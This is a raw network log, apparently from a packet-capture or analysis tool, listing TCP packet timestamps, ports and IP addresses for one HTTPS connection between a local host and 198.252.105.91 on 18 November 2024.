                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.046714067 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.046747923 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.046765089 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.046818018 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.079955101 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.079976082 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.080034971 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.080069065 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.080095053 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.080111980 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.092308044 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.092324972 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.092400074 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.092426062 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.092470884 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.434518099 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.434531927 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.434568882 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.434660912 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.434679031 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.434741974 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.434746981 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.434787035 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.434827089 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.514847040 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.514873981 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.515054941 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.515074015 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.515127897 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.632235050 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.632260084 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.632390022 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.632417917 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.632467031 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.871140957 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.871165991 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.871337891 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.871356964 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.871385098 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.871403933 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.871406078 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.871418953 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.871486902 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.871520042 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.957412004 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.957421064 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.957650900 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.957668066 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.957726002 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.101639032 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.101677895 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.101733923 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.101752996 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.101811886 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.222304106 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.222327948 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.222479105 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.222497940 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.222584009 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.339488983 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.339498043 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.339603901 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.339622021 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.339838028 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.339838028 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.456490040 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.456522942 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.456584930 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.456602097 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.456628084 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.456649065 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.617674112 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.617703915 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.617867947 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.617867947 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.617897034 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.617944956 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.735152960 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.735184908 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.735330105 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.735353947 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.735399008 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.852237940 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.852266073 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.852395058 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.852416992 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.852432966 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.852458000 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.969569921 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.969608068 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.969666004 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.969686985 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.969705105 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.969727993 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.086704016 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.086739063 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.086791992 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.086817026 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.086843014 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.086859941 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.276891947 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.276923895 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.277021885 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.277049065 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.277091026 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.471961975 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.472004890 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.472126007 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.472145081 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.472194910 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.557539940 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.557605982 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.557651043 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.557665110 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.557701111 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.557723045 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.791814089 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.791872025 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.791939020 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.791954041 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.791992903 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.792006016 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.003717899 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.003761053 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.003875971 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.003887892 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.003912926 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.003938913 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.294306040 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.294322968 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.294362068 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.294428110 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.294446945 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.294472933 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.294497967 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.378539085 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.378563881 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.378659010 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.378686905 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.378695011 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.378806114 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.612837076 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.612869024 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.612905979 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.612998962 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.613018036 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.613044024 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.613069057 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.964466095 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.964500904 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.964550018 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.964618921 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.964636087 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.964670897 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.964693069 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.198679924 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.198695898 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.198740959 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.198817015 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.198833942 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.198859930 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.198879957 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.481389046 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.481404066 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.481440067 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.481466055 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.481518030 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.481529951 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.481570005 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.715696096 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.715712070 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.715743065 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.715867996 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.715898037 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.715905905 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.716020107 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.902101994 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.902128935 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.902214050 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.902232885 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:37.902286053 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.067393064 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.067420959 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.067468882 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.067492008 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.067502022 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.067548037 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.253731012 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.253765106 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.253868103 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.253881931 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.253901958 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.253937006 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.370994091 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.371016026 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.371157885 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.371179104 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.371258020 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.488801956 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.488825083 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.489001989 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.489046097 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.489192009 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.653400898 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.653426886 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.653493881 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.653522968 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.653531075 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.653789997 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.803534031 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.803559065 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.803633928 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.803654909 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.803719997 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.957568884 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.957590103 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.957742929 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.957778931 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:38.957851887 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.129897118 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.129929066 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.129992008 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.130003929 CET44349700198.252.105.91192.168.2.7
